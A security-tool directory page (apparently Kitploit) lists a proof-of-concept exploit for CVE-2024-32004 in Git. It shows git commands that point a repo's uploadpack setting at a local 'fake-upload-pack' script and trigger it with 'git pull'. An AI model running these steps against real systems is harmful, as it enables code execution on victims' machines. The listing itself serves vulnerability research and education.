Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-32004 — Proof-of-concept exploit for CVE-2024-32004, a Git remote code execution vulnerability, demonstrating exploitation via a malicious upload-pack filter. | Kitploit
Tools/GitHubGitHub/wadewfsssss/cve-2024-32004
Vulnerability AnalysisCode AnalysisExploitationWeb SecurityLearning & Education
GitHubwadewfsssss/cve-2024-32004

CVE-2024-32004

Proof-of-concept exploit for CVE-2024-32004, a Git remote code execution vulnerability, demonstrating exploitation via a malicious upload-pack filter.

View Repository
22 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Create tmp repo, set uploadpack.allowfilter to true

git init tmp

git -C tmp config uploadpack.allowfilter 1

Clone evil from tmp repo

git clone --filter=blob:none --no-local --no-checkout tmp evil

rm -rf tmp

Configure remote filter script

git -C evil config remote.origin.uploadpack "./fake-upload-pack"

Execute malicious script

git pull

Download Tool